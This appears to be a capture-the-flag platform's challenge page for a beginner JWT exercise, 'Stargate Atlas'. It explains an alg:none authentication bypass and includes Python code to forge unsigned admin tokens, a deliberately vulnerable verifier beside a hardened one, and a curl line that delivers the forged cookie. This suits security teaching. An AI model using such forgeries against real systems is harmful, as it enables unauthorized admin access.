easy · JWT · Free

Stargate Atlas

A spaceflight-tracking enthusiast site with launch countdowns, mission archives, and subscriber-only telemetry notes. The team's in-house token format leans on a flag the spec said you should never ship in production.

The Scenario

Stargate Atlas grew out of one engineer's weekend project tracking upcoming rocket launches. After the Discord hit ten thousand members they bolted on subscriber accounts and a hand-rolled token auth layer — the kind of layer where every shortcut taken at 2 a.m. ends up in the public site copy somewhere.

Challenge Intel

Synopsis

The site's JWT verifier accepts unsigned tokens. Forge a token with the "none" algorithm and a role of admin, replace the sa_token cookie, and the admin manifest viewer prints the flag.

What It Is

On login the server issues an HS256 JWT, signed with a random in-process secret, in the sa_token cookie. The verifier is jwt.decode(token, key=SECRET, algorithms=["HS256", "none"]): a junior dev left "none" in the algorithm list to support "unsigned debug tokens", so the alg value the client puts in the token header decides whether a signature is checked at all. An attacker crafts a header of {"alg":"none"}, a payload of {"role":"admin"} and an empty signature segment (the token ends in a trailing dot), and the verifier accepts it because "none" is allowlisted. /admin/manifests then checks role == "admin" and renders the flag in the "Manifest signing reference" line. One caveat for the real world: a stock PyJWT 2.x install rejects this token even with "none" allowlisted (its NoneAlgorithm.verify() always returns False and its prepare_key() refuses a non-empty key), so the accepting behaviour here is that of the site's hand-rolled verifier; the lesson, never allowlist "none" and never let the token choose its own algorithm, applies to library and custom code alike.
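As an added example that is not the challenge's own code, the following stdlib-only Python sketch shows the three pieces the paragraph describes side by side: the issuer that signs HS256 tokens, the attacker's alg:none forgery with an empty signature segment, and a hand-rolled verifier that honours whatever alg the client declares as long as it is allowlisted (the bug), next to the same verifier with the algorithm pinned (the fix). SECRET, the function names and the verify() implementation are constructed for illustration; nothing here calls PyJWT, and the vulnerable branch deliberately mirrors the behaviour the text attributes to the site's verifier.

```python
from __future__ import annotations

import base64
import hashlib
import hmac
import json
import os

# Constructed stand-in for the challenge's random in-process signing key.
SECRET = os.urandom(32)


def b64url(data: bytes) -> str:
    """Base64url without padding, as JWS requires."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(segment: str) -> bytes:
    """Restore the padding b64url stripped so base64 can decode it."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _segment(obj: dict) -> str:
    return b64url(json.dumps(obj, separators=(",", ":")).encode())


def issue_hs256(payload: dict, secret: bytes) -> str:
    """Login handler: HMAC-SHA256 over header.payload, three dot-joined segments."""
    header = _segment({"alg": "HS256", "typ": "JWT"})
    body = _segment(payload)
    sig = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url(sig)}"


def inspect(token: str) -> tuple[dict, dict]:
    """Recon step: decode header and payload without verifying anything."""
    header, body, _sig = token.split(".")
    return json.loads(b64url_decode(header)), json.loads(b64url_decode(body))


def forge_none(payload: dict) -> str:
    """Attacker side: alg=none header, chosen claims, empty signature segment."""
    return f"{_segment({'alg': 'none', 'typ': 'JWT'})}.{_segment(payload)}."


def verify(token: str, secret: bytes, algorithms: list[str]) -> dict | None:
    """Hand-rolled verifier (hypothetical). The client-declared alg is trusted
    whenever it appears in `algorithms`; with "none" in that list, an unsigned
    token passes. Returns the claims on success, None on any failure."""
    try:
        header_seg, body_seg, sig_seg = token.split(".")
        header = json.loads(b64url_decode(header_seg))
    except (ValueError, json.JSONDecodeError):
        return None
    alg = header.get("alg")
    if alg not in algorithms:
        return None
    if alg == "none":
        # The bug: an empty signature is accepted as "verified".
        return None if sig_seg != "" else json.loads(b64url_decode(body_seg))
    if alg == "HS256":
        expected = hmac.new(secret, f"{header_seg}.{body_seg}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64url_decode(sig_seg)):
            return None
        return json.loads(b64url_decode(body_seg))
    return None


def verify_vulnerable(token: str, secret: bytes) -> dict | None:
    """The challenge's allowlist: "none" included."""
    return verify(token, secret, ["HS256", "none"])


def verify_hardened(token: str, secret: bytes) -> dict | None:
    """The fix: pin the one algorithm the server actually issues."""
    return verify(token, secret, ["HS256"])


def is_admin(claims: dict | None) -> bool:
    """The /admin/manifests gate as the page describes it."""
    return claims is not None and claims.get("role") == "admin"


if __name__ == "__main__":
    real = issue_hs256({"sub": "alice", "role": "subscriber"}, SECRET)
    print("issued header/payload:", inspect(real))
    forged = forge_none({"sub": "alice", "role": "admin"})
    print("forged token:", forged)
    print("vulnerable verifier grants admin:", is_admin(verify_vulnerable(forged, SECRET)))
    print("hardened verifier grants admin:  ", is_admin(verify_hardened(forged, SECRET)))
```

Against the live site the only extra step is delivery: put the forged value in the sa_token cookie (for example curl -b "sa_token=<forged>" against /admin/manifests) and read the "Manifest signing reference" line. Note that the hardened verifier still rejects a real HS256 token whose payload has been edited, because the HMAC no longer matches; the alg:none path is the only route that bypasses the signature entirely.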

Who It's For

Brand-new players starting the JWT module. No tooling beyond curl and base64 required.

Skills You'll Practice

  • Decoding a JWT to inspect header and payload
  • Forging an alg:none JWT with an empty signature
  • Recognising when a verifier trusts a client-supplied algorithm

What You'll Gain

  • Never include "none" in a JWT verifier's allowlist
  • Always pin the expected algorithm server-side; the token header must not choose how it is verified
  • Public dev-notes / about pages are recon goldmines

Ready to hack Stargate Atlas?

This challenge is free. Sign up and start hacking.